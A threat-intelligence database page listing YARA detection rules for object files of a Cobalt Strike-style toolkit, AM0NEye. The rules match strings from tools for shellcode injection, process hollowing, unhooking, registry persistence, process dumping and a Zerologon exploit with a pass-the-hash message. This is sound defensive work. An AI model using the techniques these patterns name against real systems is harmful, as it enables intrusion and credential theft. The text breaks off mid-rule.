Resecurity | C2 Frameworks - Threat Hunting in Action with YARA Rules
Tags
Common Information
Type | Value |
---|---|
UUID | 9cb7028e-ea21-477c-bcb6-d59609f35418 |
Fingerprint | 8f322c73ec3b6471 |
Analysis status | DONE |
Considered CTI value | 2 |
Text language | |
Published | Aug. 2, 2024, midnight |
Added to db | Aug. 31, 2024, 10:04 a.m. |
Last updated | Nov. 17, 2024, 7:44 p.m. |
Headline | C2 Frameworks - Threat Hunting in Action with YARA Rules |
Title | Resecurity | C2 Frameworks - Threat Hunting in Action with YARA Rules |
Detected Hints/Tags/Attributes | 145/2/396 |
Source URLs
URL Provider
RSS Feed
Details | Id | Enabled | Feed title | Url | Added to db |
---|---|---|---|---|---|
Details | 364 | ✔ | Resecurity | https://www.resecurity.com/feed | 2024-08-30 22:08 |
Attributes
Details | Type | #Events | CTI | Value |
---|---|---|---|---|
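import "hash"

// AM0NEye - etw.x86.o: a 32-bit Cobalt Strike-style beacon object file (BOF).
// The strings are the COFF import symbols (stdcall-decorated, "@N") and the
// status messages of the object; uint16(0) == 0x014c is the COFF Machine
// field IMAGE_FILE_MACHINE_I386 at offset 0 of a .o file.
rule AM0NEye_EtwX86
{
    meta:
        description = "AM0NEye - etw.x86.o"
        sha256 = "a14d6a30e886a19d47fad3e66b8dd5a6ead3e3a0bd7f8d3a6e001542740e9190"

    strings:
        $s1 = "__imp__KERNEL32$GetCurrentProcess@0" ascii fullword
        $s2 = "__imp__KERNEL32$ReadProcessMemory@20" ascii fullword
        $s3 = "ReadProcessMemory failed" ascii fullword
        $s4 = "__imp__KERNEL32$GetProcAddress@8" ascii fullword
        $s5 = "Failed to find function address" ascii fullword
        $s6 = "__imp__KERNEL32$LoadLibraryA@4" ascii fullword
        $s7 = "__imp__KERNEL32$VirtualProtect@16" ascii fullword
        $s8 = "__imp__BeaconDataExtract" ascii fullword
        $s9 = "__imp__MSVCRT$strcmp" ascii fullword
        $s10 = "__imp__BeaconPrintf" ascii fullword
        $s11 = "__imp__BeaconDataParse" ascii fullword
        $s12 = "Could not load library" ascii fullword
        $s13 = "__imp__MSVCRT$memcpy" ascii fullword
        $s14 = "Working with 32-bit." ascii fullword
        $s15 = "0`.data" ascii fullword
        // Compiler banner: ties this string to one toolchain build; it is
        // expected to disappear on any recompile.
        $s16 = "GCC: (GNU) 10-win32 20220324" ascii fullword

    condition:
        // Cheap size gate first: hash.sha256(0, filesize) reads the whole file,
        // so only hash small candidates instead of every scanned file.
        // Assumes the reference sample is itself under 6KB -- confirm.
        filesize < 6KB and
        (
            hash.sha256(0, filesize) == "a14d6a30e886a19d47fad3e66b8dd5a6ead3e3a0bd7f8d3a6e001542740e9190"
            or (uint16(0) == 0x014c and 8 of them)
        )
}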
|
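import "hash"

// AM0NEye - FindModule.o: 64-bit BOF. The ExecuteSimpleSystemCallBase_*
// symbols are direct-syscall stubs branched per Windows build (6_1_7601,
// 6_2, 6_3, 10_0); SeDebugPrivilege / LookupPrivilegeValueW show it
// enables the debug privilege before enumerating process modules.
// uint16(0) == 0x8664 is the COFF Machine field IMAGE_FILE_MACHINE_AMD64.
rule AM0NEye_FindModule
{
    meta:
        description = "AM0NEye - FindModule.o"
        sha256 = "6382401da4b33f85be0491f73d26080748821f25ce457dfee4c55c43308867c4"

    strings:
        $s1 = "ExecuteSimpleSystemCallBase_Epilogue" ascii fullword
        $s2 = "EnumerateProcessModules" ascii fullword
        $s3 = "ExecuteSimpleSystemCallBase_Check_6_X_XXXX" ascii fullword
        $s4 = "ExecuteSimpleSystemCallBase_Finished" ascii fullword
        $s5 = "ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX" ascii fullword
        $s6 = "ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX" ascii fullword
        $s7 = "ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX" ascii fullword
        $s8 = "ExecuteSimpleSystemCallBase_Check_6_1_XXXX" ascii fullword
        $s9 = "ExecuteSimpleSystemCallBase_Check_X_X_XXXX" ascii fullword
        $s10 = "ExecuteSimpleSystemCallBase_SystemCall_6_1_7601" ascii fullword
        $s11 = "ExecuteSimpleSystemCallBase_SystemCall_Unknown" ascii fullword
        $s12 = "ExecuteSimpleSystemCallBase" ascii fullword
        $s13 = "IsElevated" ascii fullword
        $s14 = "__imp_ADVAPI32$LookupPrivilegeValueW" ascii fullword
        $s15 = " ProcessID: %lu" ascii fullword
        $s16 = " ProcessName: %wZ" ascii fullword
        $s17 = "GetCurrentPid" ascii fullword
        $s18 = "SeDebugPrivilege" wide fullword
        $s19 = "FindModule.c" ascii fullword
        $s20 = "__imp_MSVCRT$_wcsicmp" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 20KB -- confirm.
        // Note: $s1-$s12 are shared syscall-stub symbols (see FindProcHandle);
        // expect cross-hits between the two rules on related objects.
        filesize < 20KB and
        (
            hash.sha256(0, filesize) == "6382401da4b33f85be0491f73d26080748821f25ce457dfee4c55c43308867c4"
            or (uint16(0) == 0x8664 and 8 of them)
        )
}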
|
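import "hash"

// AM0NEye - FindProcHandle.o: 64-bit BOF sharing the per-OS-build direct
// syscall stubs (ExecuteSimpleSystemCallBase_*) with FindModule.o; the
// object-specific strings are GetPid, "Process" and the ProcessId error text.
rule AM0NEye_FindProcHandle
{
    meta:
        description = "AM0NEye - FindProcHandle.o"
        sha256 = "147cf27ec2845164782b690977545697f77e7df3acc904118722d071eadad0aa"

    strings:
        $s1 = "ExecuteSimpleSystemCallBase_Epilogue" ascii fullword
        $s2 = "ExecuteSimpleSystemCallBase_Check_6_X_XXXX" ascii fullword
        $s3 = "ExecuteSimpleSystemCallBase_Finished" ascii fullword
        $s4 = "ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX" ascii fullword
        $s5 = "ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX" ascii fullword
        $s6 = "ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX" ascii fullword
        $s7 = "ExecuteSimpleSystemCallBase_Check_6_1_XXXX" ascii fullword
        $s8 = "ExecuteSimpleSystemCallBase_Check_X_X_XXXX" ascii fullword
        $s9 = "ExecuteSimpleSystemCallBase_SystemCall_6_1_7601" ascii fullword
        $s10 = "ExecuteSimpleSystemCallBase_SystemCall_Unknown" ascii fullword
        $s11 = "ExecuteSimpleSystemCallBase" ascii fullword
        $s12 = "IsElevated" ascii fullword
        $s13 = "Failed to obtain ProcessId..." ascii fullword
        $s14 = "__imp_ADVAPI32$LookupPrivilegeValueW" ascii fullword
        $s15 = " ProcessID: %lu" ascii fullword
        $s16 = " ProcessName: %ls" ascii fullword
        $s17 = "GetPid" ascii fullword
        $s18 = "Process" wide fullword
        $s19 = "SeDebugPrivilege" wide fullword
        $s20 = "__imp_MSVCRT$_wcsicmp" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 20KB -- confirm.
        // 8 of them can be satisfied by the shared syscall-stub symbols alone,
        // so this rule and AM0NEye_FindModule will co-fire on related objects.
        filesize < 20KB and
        (
            hash.sha256(0, filesize) == "147cf27ec2845164782b690977545697f77e7df3acc904118722d071eadad0aa"
            or (uint16(0) == 0x8664 and 8 of them)
        )
}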
|
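import "hash"

// AM0NEye - GetDomainInfo.o: 64-bit BOF that calls DsGetDcNameA and prints
// the DC / forest / site names (NETAPI32 imports and format strings).
rule AM0NEye_GetDomainInfo
{
    meta:
        description = "AM0NEye - GetDomainInfo.o"
        sha256 = "039586f2d56ef93343980bf7734c350f6898acc457c1bae184391439c1820d86"

    strings:
        $s1 = "__imp_NETAPI32$DsGetDcNameA" ascii fullword
        $s2 = "Domain Controller Address: %s" ascii fullword
        $s3 = "Domain Controller: %s" ascii fullword
        $s4 = "Domain Forest Name: %s" ascii fullword
        $s5 = "__imp_NETAPI32$NetApiBufferFree" ascii fullword
        $s6 = "DC Site Name: %s" ascii fullword
        // Compiler banner and section-header bytes: brittle, they change on
        // any rebuild with a different toolchain. Because the condition is
        // "all of them", a recompiled object will NOT match this rule.
        $s7 = "GCC: (GNU) 10-win32 20220324" ascii fullword
        $s8 = "P@.xdata" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 2KB -- confirm.
        filesize < 2KB and
        (
            hash.sha256(0, filesize) == "039586f2d56ef93343980bf7734c350f6898acc457c1bae184391439c1820d86"
            or (uint16(0) == 0x8664 and all of them)
        )
}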
|
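import "hash"

// AM0NEye - RegistryPersistence.o: 64-bit BOF with Install/Remove arguments
// that sets or deletes a registry value (RegSetValueExW / RegDeleteKeyValueW);
// the "Update" value name and the status messages are the specific strings.
rule AM0NEye_RegistryPersistence
{
    meta:
        description = "AM0NEye - RegistryPersistence.o"
        sha256 = "f5b1230386f9242f4c88edf893b7d97d901fb55d794c0f27a520d093b232e643"

    strings:
        $s1 = "__imp_ADVAPI32$RegOpenKeyExW" ascii fullword
        $s2 = "Failed to open key " ascii fullword
        $s3 = "Key deleted in registry, persistence removed. " ascii fullword
        $s4 = "__imp_ADVAPI32$RegCloseKey" ascii fullword
        $s5 = "Unsuccessful in opening key " ascii fullword
        $s6 = "__imp_ADVAPI32$RegDeleteKeyValueW" ascii fullword
        $s7 = "Key opened " ascii fullword
        $s8 = "Key changed in registry, persistence installed " ascii fullword
        $s9 = "Key not changed in registry " ascii fullword
        $s10 = "Key not deleted in registry " ascii fullword
        $s11 = "Update" wide fullword
        $s12 = "Install" ascii fullword
        $s13 = "__imp_MSVCRT$strcmp" ascii fullword
        $s14 = "__imp_ADVAPI32$RegSetValueExW" ascii fullword
        $s15 = "Please use either an Install or Remove argument." ascii fullword
        $s16 = "RemovePersistence" ascii fullword
        $s17 = "InstallPersistence" ascii fullword
        $s18 = "Remove" ascii fullword
        $s19 = "Cannot find key value in registry " ascii fullword
        $s20 = "Key location open successful " ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 8KB -- confirm.
        filesize < 8KB and
        (
            hash.sha256(0, filesize) == "f5b1230386f9242f4c88edf893b7d97d901fb55d794c0f27a520d093b232e643"
            or (uint16(0) == 0x8664 and 8 of them)
        )
}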
|
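import "hash"

// AM0NEye - cThreadHijack.o: 64-bit BOF that writes Beacon shellcode into a
// remote process, suspends a thread and repoints its RIP (GetThreadContext,
// WriteProcessMemory and the "[+] ..." status strings). $x1/$x2 are the
// high-confidence messages; $s6 is the author's build path.
rule AM0NEye_cThreadHijack
{
    meta:
        description = "AM0NEye - cThreadHijack.o"
        sha256 = "d6fd0dd6a3a4bde08a2354e9298c1dacc6495c2173100b489e3c1d4526817a40"

    strings:
        $x1 = "[+] Wrote Beacon shellcode to the remote process!" ascii fullword
        $x2 = "[+] Target process PID: %d" ascii fullword
        $s3 = "[+] Successfully pointed the target thread's RIP register to the shellcode!" ascii fullword
        $s4 = "[+] Found a thread in the target process! Thread ID: %d" ascii fullword
        $s5 = "[+] Size of shellcode: %d bytes" ascii fullword
        $s6 = "C:\\Users\\ANON\\Desktop\\cThreadHijack\\cThreadHijack.o" ascii fullword
        $s7 = "__imp_KERNEL32$OpenProcess" ascii fullword
        $s8 = "__imp_KERNEL32$WriteProcessMemory" ascii fullword
        $s9 = "Error! Unable to set the target thread's RIP register. Error: 0x%lx" ascii fullword
        $s10 = "Error! Unable to write shellcode to allocated buffer. Error: 0x%lx" ascii fullword
        $s11 = "Error! Unable to get the state of the target thread. Error: 0x%lx" ascii fullword
        $s12 = "Error! Unable to open a handle to the process. Error: 0x%lx" ascii fullword
        $s13 = "__imp_KERNEL32$GetLastError" ascii fullword
        $s14 = "[+] Resuming the thread! Please wait for the Beacon payload to execute. This could take some time..." ascii fullword
        $s15 = "__imp_KERNEL32$GetThreadContext" ascii fullword
        $s16 = "[+] Suspending the targeted thread..." ascii fullword
        $s17 = "[+] Virtual memory for CreateThread and NtContinue routines allocated at 0x%llx inside of the remote process!" ascii fullword
        $s18 = "Error! Unable to allocate memory in the remote process. Error: 0x%lx" ascii fullword
        $s19 = "Error! Unable to allocate memory within the remote process. Error: 0x%lx" ascii fullword
        $s20 = "__imp_KERNEL32$GetModuleHandleA" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 20KB -- confirm.
        // "4 of them" counts the $x strings too, so one $x plus three $s
        // strings is enough.
        filesize < 20KB and
        (
            hash.sha256(0, filesize) == "d6fd0dd6a3a4bde08a2354e9298c1dacc6495c2173100b489e3c1d4526817a40"
            or (uint16(0) == 0x8664 and 1 of ($x*) and 4 of them)
        )
}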
|
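import "hash"

// AM0NEye - unhook.x64.o: 64-bit BOF (unhook-bof build path in $s1). The
// $pdata$/$unwind$ entries are x64 unwind-info symbols for the listed
// functions; GetRedirectedName_V2/V4/V6 and IsBeaconDLL are the
// object-specific function names, the KERNEL32 imports are generic.
rule AM0NEye_UnhookX64
{
    meta:
        description = "AM0NEye - unhook.x64.o"
        sha256 = "3a9a917e6760f130a71ad17184b7f6ea67787ce0cbd9cfa0260e72b085e6aebe"

    strings:
        $s1 = "C:\\Users\\user\\Desktop\\unhook-bof\\unhook.x64.o" ascii fullword
        $s2 = "$pdata$GetProcessEnvironmentBlock" ascii fullword
        $s3 = "$unwind$GetProcessEnvironmentBlock" ascii fullword
        $s4 = "GetProcessEnvironmentBlock" ascii fullword
        $s5 = "__imp_KERNEL32$GetModuleHandleW" ascii fullword
        $s6 = "__imp_KERNEL32$CloseHandle" ascii fullword
        $s7 = "__imp_KERNEL32$VirtualProtect" ascii fullword
        $s8 = "$unwind$GetRedirectedName" ascii fullword
        $s9 = "$pdata$GetRedirectedName_V4" ascii fullword
        $s10 = "$unwind$GetRedirectedName_V6" ascii fullword
        $s11 = "IsBeaconDLL" ascii fullword
        $s12 = "__imp_KERNEL32$CreateFileW" ascii fullword
        $s13 = "$pdata$GetRedirectedName_V2" ascii fullword
        $s14 = "__imp_KERNEL32$UnmapViewOfFile" ascii fullword
        $s15 = "__imp_KERNEL32$LoadLibraryW" ascii fullword
        $s16 = "$pdata$IsBeaconDLL" ascii fullword
        $s17 = "$unwind$GetRedirectedName_V4" ascii fullword
        $s18 = "$unwind$CustomGetModuleHandleW" ascii fullword
        $s19 = "$pdata$GetRedirectedName_V6" ascii fullword
        $s20 = "$unwind$IsBeaconDLL" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 40KB -- confirm.
        filesize < 40KB and
        (
            hash.sha256(0, filesize) == "3a9a917e6760f130a71ad17184b7f6ea67787ce0cbd9cfa0260e72b085e6aebe"
            or (uint16(0) == 0x8664 and 8 of them)
        )
}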
|
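import "hash"

// AM0NEye - curl.x64.o: 64-bit BOF issuing HTTP requests through WinINet
// (InternetOpenA/InternetConnectA/HttpOpenRequestA/HttpSendRequestA) and
// printing the response code; __imp_BeaconDataInt marks it as a BOF.
rule AM0NEye_CurlX64
{
    meta:
        description = "AM0NEye - curl.x64.o"
        sha256 = "a72a9b039ddd668ce86022621c6d073048b0d4ab38beb0d9bc98287e5a14c206"

    strings:
        $s1 = "User Agent: %s" ascii fullword
        $s2 = "__imp_KERNEL32$lstrlenA" ascii fullword
        $s3 = "__imp_WININET$HttpSendRequestA" ascii fullword
        $s4 = "__imp_WININET$InternetReadFile" ascii fullword
        $s5 = "sendHttpRequest" ascii fullword
        $s6 = "Retrieving HTTP Request info failed" ascii fullword
        $s7 = "__imp_WININET$HttpOpenRequestA" ascii fullword
        $s8 = "__imp_WININET$HttpQueryInfoA" ascii fullword
        $s9 = "%s %s:%i %s" ascii fullword
        $s10 = "Response Code: %s" ascii fullword
        $s11 = "__imp_BeaconDataInt" ascii fullword
        $s12 = "__imp_WININET$InternetConnectA" ascii fullword
        $s13 = "__imp_MSVCRT$strtok" ascii fullword
        $s14 = "__imp_MSVCRT$strcmp" ascii fullword
        $s15 = "entry.c" ascii fullword
        $s16 = "No response." ascii fullword
        $s17 = "__imp_WININET$InternetCloseHandle" ascii fullword
        $s18 = "__imp_WININET$InternetOpenA" ascii fullword
        // Section-header bytes and compiler banner: toolchain-specific, brittle.
        $s19 = "P@.xdata" ascii fullword
        $s20 = "GCC: (GNU) 10-win32 20200525" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 10KB -- confirm.
        filesize < 10KB and
        (
            hash.sha256(0, filesize) == "a72a9b039ddd668ce86022621c6d073048b0d4ab38beb0d9bc98287e5a14c206"
            or (uint16(0) == 0x8664 and 8 of them)
        )
}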
|
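import "hash"

// AM0NEye - etw.x64.o: 64-bit counterpart of etw.x86.o. Same imports
// (ReadProcessMemory, GetProcAddress, LoadLibraryA, VirtualProtect) and
// messages, with undecorated x64 import symbols and "Working with 64-bit.".
rule AM0NEye_EtwX64
{
    meta:
        description = "AM0NEye - etw.x64.o"
        sha256 = "3b74e42f53475b6bb3792e9a8b5de22e6ab7a8037c10bfa2efca4d8fa2eb66be"

    strings:
        $s1 = "__imp_KERNEL32$GetCurrentProcess" ascii fullword
        $s2 = "__imp_KERNEL32$ReadProcessMemory" ascii fullword
        $s3 = "ReadProcessMemory failed" ascii fullword
        $s4 = "__imp_KERNEL32$GetProcAddress" ascii fullword
        $s5 = "Failed to find function address" ascii fullword
        $s6 = "__imp_KERNEL32$LoadLibraryA" ascii fullword
        $s7 = "__imp_KERNEL32$VirtualProtect" ascii fullword
        $s8 = "__imp_MSVCRT$strcmp" ascii fullword
        $s9 = "Could not load library" ascii fullword
        $s10 = "Working with 64-bit." ascii fullword
        $s11 = "__imp_MSVCRT$memcpy" ascii fullword
        // Section-header bytes and compiler banner: toolchain-specific, brittle.
        $s12 = "P@.xdata" ascii fullword
        $s13 = "GCC: (GNU) 10-win32 20200525" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 6KB -- confirm.
        // With only 13 strings, 8 of them is a fairly high bar; most of the
        // imports are generic KERNEL32/MSVCRT symbols found in many BOFs.
        filesize < 6KB and
        (
            hash.sha256(0, filesize) == "3b74e42f53475b6bb3792e9a8b5de22e6ab7a8037c10bfa2efca4d8fa2eb66be"
            or (uint16(0) == 0x8664 and 8 of them)
        )
}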
|
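import "hash"

// AM0NEye - process-hollowing.x64.o: 64-bit BOF that spawns a process with
// CreateProcessA, allocates memory in it (VirtualAllocEx), writes a payload
// and queues an APC on its main thread (QueueUserAPC / ResumeThread).
// $x1-$x5 are the distinctive status messages.
rule AM0NEye_ProcessHollowingX64
{
    meta:
        description = "AM0NEye - process-hollowing.x64.o"
        sha256 = "a453b3510ef0aa993b88f49d2a6f7a85bfab407033afb23340287b94eddff86d"

    strings:
        $x1 = "[+] Success - Your thread was resumed and your shellcode is being executed within the remote process!" ascii fullword
        $x2 = "[+] Success - Spawned process for %s at %d (PID)" ascii fullword
        $x3 = "[!] Failure - Could not queue APC for main thread of %d (PID) to shellcode address 0x%p" ascii fullword
        $x4 = "[+] Success - APC queued for main thread of %d (PID) to shellcode address 0x%p" ascii fullword
        $x5 = "[!] Failure - Could not create a process for %s using CreateProcessA()" ascii fullword
        $s6 = "[+] Success - Wrote %d bytes to memory in remote process %d (PID) at 0x%p" ascii fullword
        $s7 = "[!] Failure - Could not allocate memory to remote process %d (PID)" ascii fullword
        $s8 = "[+] Success - Allocated RE memory in remote process %d (PID) at: 0x%p" ascii fullword
        $s9 = "[!] Failure - Could not write payload to memory at 0x%p" ascii fullword
        $s10 = "__imp_KERNEL32$WriteProcessMemory" ascii fullword
        $s11 = "[!] Failure - Could not resume thread." ascii fullword
        $s12 = "__imp_KERNEL32$CreateProcessA" ascii fullword
        $s13 = "__imp_KERNEL32$ResumeThread" ascii fullword
        $s14 = "__imp_KERNEL32$QueueUserAPC" ascii fullword
        $s15 = "__imp_KERNEL32$VirtualAllocEx" ascii fullword
        $s16 = "__imp_MSVCRT$memset" ascii fullword
        $s17 = "__imp_BeaconDataLength" ascii fullword
        $s18 = "hollow.x64.c" ascii fullword
        // Section-header bytes and compiler banner: toolchain-specific, brittle.
        $s19 = "P@.xdata" ascii fullword
        $s20 = "GCC: (GNU) 12 20220819" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 10KB -- confirm.
        filesize < 10KB and
        (
            hash.sha256(0, filesize) == "a453b3510ef0aa993b88f49d2a6f7a85bfab407033afb23340287b94eddff86d"
            or (uint16(0) == 0x8664 and 1 of ($x*) and 4 of them)
        )
}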
|
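import "hash"

// AM0NEye - secinject.x64.o: 64-bit BOF that injects via a shared section:
// NtCreateSection + NtMapViewOfSection into local and remote process
// (the "Error mapping local/remote process" strings), then CreateRemoteThread.
rule AM0NEye_SecinjectX64
{
    meta:
        description = "AM0NEye - secinject.x64.o"
        sha256 = "1e5a2a850f7cbfc5d306487ec75bbd436e5c8652304ad2b2a8a14b3386e63efd"

    strings:
        $s1 = "__imp_KERNEL32$GetCurrentProcess" ascii fullword
        $s2 = "__imp_KERNEL32$OpenProcess" ascii fullword
        $s3 = "[!] Error mapping remote process. Aborting..." ascii fullword
        $s4 = "__imp_KERNEL32$CreateRemoteThread" ascii fullword
        $s5 = "secinject.c" ascii fullword
        $s6 = "[!] Error mapping local process Aborting..." ascii fullword
        $s7 = "[!] Error unmapping view" ascii fullword
        $s8 = "__imp_NTDLL$NtUnmapViewOfSection" ascii fullword
        $s9 = "__imp_NTDLL$NtMapViewOfSection" ascii fullword
        $s10 = "__imp_NTDLL$NtClose" ascii fullword
        $s11 = "__imp_NTDLL$NtCreateSection" ascii fullword
        $s12 = "[!] Error closing handle" ascii fullword
        $s13 = "mycopy" ascii fullword
        $s14 = "mycmpi" ascii fullword
        $s15 = "__imp_BeaconDataInt" ascii fullword
        $s16 = "[!] Error creating RWX memory section Aborting..." ascii fullword
        // Compiler banner and section-header bytes: toolchain-specific, brittle.
        $s17 = "GCC: (GNU) 10-win32 20210110" ascii fullword
        $s18 = "0@.rdata" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 8KB -- confirm.
        filesize < 8KB and
        (
            hash.sha256(0, filesize) == "1e5a2a850f7cbfc5d306487ec75bbd436e5c8652304ad2b2a8a14b3386e63efd"
            or (uint16(0) == 0x8664 and 8 of them)
        )
}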
|
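import "hash"

// AM0NEye - syscallsdump.x64.o: 64-bit BOF that enables SeDebugPrivilege,
// unhooks NtReadVirtualMemory via Zw* calls and writes a minidump of a PID
// (MiniDumpWriteDump). The SW2_ prefix is the naming used by
// SysWhispers2-generated direct-syscall stubs.
rule AM0NEye_SyscallsdumpX64
{
    meta:
        description = "AM0NEye - syscallsdump.x64.o"
        sha256 = "b33dc013e2168ebb37d8ac80dbcd778c6bda2ede4927b47ec95f32c87ad125fd"

    strings:
        $s1 = "Dumping PID %d to file: %s" ascii fullword
        $s2 = "Failed to retrieve PID %d process handle." ascii fullword
        $s3 = "Failed to create dump file at %s" ascii fullword
        $s4 = "Failed to set debug privilege." ascii fullword
        $s5 = "Failed to create minidump." ascii fullword
        $s6 = "Unhooking - Initial ZwProtectVirtualMemory failed." ascii fullword
        $s7 = "Unhooking - ZwWriteVirtualMemory failed." ascii fullword
        $s8 = "Unhooking - Final ZwProtectVirtualMemory failed." ascii fullword
        $s9 = "__imp_DBGHELP$MiniDumpWriteDump" ascii fullword
        $s10 = "__imp_ADVAPI32$LookupPrivilegeValueW" ascii fullword
        $s11 = "Failed to unhook NtReadVirtualMemory." ascii fullword
        $s12 = " [!] OS Version not supported." ascii fullword
        $s13 = "SW2_GetSyscallNumber" ascii fullword
        $s14 = "SeDebugPrivilege" wide fullword
        $s15 = "__imp_BeaconDataInt" ascii fullword
        $s16 = "entry.c" ascii fullword
        $s17 = "__imp_MSVCRT$_wcsicmp" ascii fullword
        $s18 = "__imp_MSVCRT$memset" ascii fullword
        $s19 = "UnhookFunction" ascii fullword
        $s20 = "__imp_MSVCRT$swprintf_s" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 30KB -- confirm.
        filesize < 30KB and
        (
            hash.sha256(0, filesize) == "b33dc013e2168ebb37d8ac80dbcd778c6bda2ede4927b47ec95f32c87ad125fd"
            or (uint16(0) == 0x8664 and 8 of them)
        )
}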
|
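import "hash"

// AM0NEye - syscallsinject.x64.o: 64-bit BOF injecting shellcode into a
// remote process through SysWhispers2-style direct syscalls (SW2_* symbols).
// $x1/$x2 are the distinctive "FAILED! X" messages.
rule AM0NEye_SyscallsinjectX64
{
    meta:
        description = "AM0NEye - syscallsinject.x64.o"
        sha256 = "23f0aeb7c61716e936820af851e7f5f04927be31cd540aba7717882161b000fb"

    strings:
        $x1 = "Copying shellcode to remote process - FAILED! X" ascii fullword
        $x2 = "Executing thread in remote process - FAILED! X" ascii fullword
        $s3 = "Shellcode injection completed successfully!" ascii fullword
        $s4 = "Opening process - FAILED! X" ascii fullword
        $s5 = "InjectShellcode" ascii fullword
        $s6 = "SW2_GetSyscallNumber" ascii fullword
        $s7 = "__imp_BeaconDataInt" ascii fullword
        $s8 = "entry.c" ascii fullword
        $s9 = "__imp_BeaconDataLength" ascii fullword
        $s10 = "SW2_HashSyscall" ascii fullword
        // Compiler banner / section bytes / an opaque byte run ($s13) are
        // artifacts of this exact build, not of the technique.
        $s11 = "GCC: (GNU) 10-win32 20200525" ascii fullword
        $s12 = "0@.rdata" ascii fullword
        $s13 = "f=Zwum" ascii fullword
        $s14 = "SW2_PopulateSyscallList" ascii fullword
        $s15 = "SW2_SyscallList" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 20KB -- confirm.
        filesize < 20KB and
        (
            hash.sha256(0, filesize) == "23f0aeb7c61716e936820af851e7f5f04927be31cd540aba7717882161b000fb"
            or (uint16(0) == 0x8664 and 1 of ($x*) and 4 of them)
        )
}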
|
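import "hash"

// AM0NEye - unhook.x86.o: 32-bit counterpart of unhook.x64.o. Function names
// carry the cdecl leading underscore and imports the stdcall "@N" suffix;
// CreateFileMappingW/MapViewOfFile suggest it maps a fresh copy of a DLL.
rule AM0NEye_UnhookX86
{
    meta:
        description = "AM0NEye - unhook.x86.o"
        sha256 = "b67570680ffd7ebf5c8479e364c7a50ccf293170feb195172b9d907b5f171a88"

    strings:
        $s1 = "C:\\Users\\user\\Desktop\\unhook-bof\\unhook.x86.o" ascii fullword
        $s2 = "_GetProcessEnvironmentBlock" ascii fullword
        $s3 = "__imp__KERNEL32$GetModuleHandleW@4" ascii fullword
        $s4 = "__imp__KERNEL32$VirtualProtect@16" ascii fullword
        $s5 = "__imp__KERNEL32$CreateFileMappingW@24" ascii fullword
        $s6 = "_CustomGetModuleHandleW" ascii fullword
        $s7 = "__imp__KERNEL32$MapViewOfFile@20" ascii fullword
        $s8 = "_GetRedirectedName_V6" ascii fullword
        $s9 = "__imp__KERNEL32$CloseHandle@4" ascii fullword
        $s10 = "__imp__KERNEL32$UnmapViewOfFile@4" ascii fullword
        $s11 = "__imp__KERNEL32$LoadLibraryW@4" ascii fullword
        $s12 = "_GetRedirectedName" ascii fullword
        $s13 = "_GetInMemoryOrderModuleList" ascii fullword
        $s14 = "_IsBeaconDLL" ascii fullword
        $s15 = "__imp__KERNEL32$CreateFileW@28" ascii fullword
        $s16 = "__imp__KERNEL32$VirtualAlloc@16" ascii fullword
        $s17 = "_GetRedirectedName_V2" ascii fullword
        $s18 = "_GetRedirectedName_V4" ascii fullword
        $s19 = "__imp__KERNEL32$VirtualFree@12" ascii fullword
        $s20 = "_CustomGetProcAddressEx@12" ascii fullword

    condition:
        // Size gate first so the full-file hash is only computed for small
        // candidates. Assumes the reference sample is under 20KB -- confirm.
        filesize < 20KB and
        (
            hash.sha256(0, filesize) == "b67570680ffd7ebf5c8479e364c7a50ccf293170feb195172b9d907b5f171a88"
            or (uint16(0) == 0x014c and 8 of them)
        )
}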
|
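import "hash"

// AM0NEye - zerologon.x64.o: 64-bit MSVC-built BOF for CVE-2020-1472 using
// the undocumented Netlogon RPC wrappers I_NetServerReqChallenge /
// I_NetServerAuthenticate2 / I_NetServerPasswordSet2. The hash in $s3/$s13
// is the NT hash of an empty password (what the exploit sets the machine
// account to). Keep the "dcscync" typo: it is what the sample contains.
rule AM0NEye_ZerologonX64
{
    meta:
        description = "AM0NEye - zerologon.x64.o"
        sha256 = "b57f0f8fe3a1682b31f61623ed224b387a56ffa21cba3cf0c75bb27e14536413"

    strings:
        $s1 = "z:\\devcenter\\zerologon\\dist\\zerologon.x64.o" ascii fullword
        $s2 = "%S is not vulnerable" ascii fullword
        $s3 = "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync" ascii fullword
        $s4 = "__imp_NETAPI32$I_NetServerPasswordSet2" ascii fullword
        $s5 = "Failed to set machine account pass for %S" ascii fullword
        // $s6-$s8, $s14-$s18: MSVC linker directives, compiler banner and
        // compiler-numbered string symbols ($SG...). Generic or build-specific.
        $s6 = "0@ /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"LIBCMT\" /DEFAULTLIB:\"OLDNAMES\" " ascii fullword
        $s7 = "@comp.id}y" ascii fullword
        $s8 = "B.data" ascii fullword
        $s9 = "$unwind$go" ascii fullword
        $s10 = "$pdata$go" ascii fullword
        $s11 = "__imp_NETAPI32$I_NetServerReqChallenge" ascii fullword
        $s12 = "__imp_NETAPI32$I_NetServerAuthenticate2" ascii fullword
        // No "fullword": this is a substring of $s3, so both count toward
        // "8 of them" whenever $s3 is present.
        $s13 = "31d6cfe0d16ae931b73c59d7e0c089c0"
        $s14 = "P`.xdata" ascii fullword
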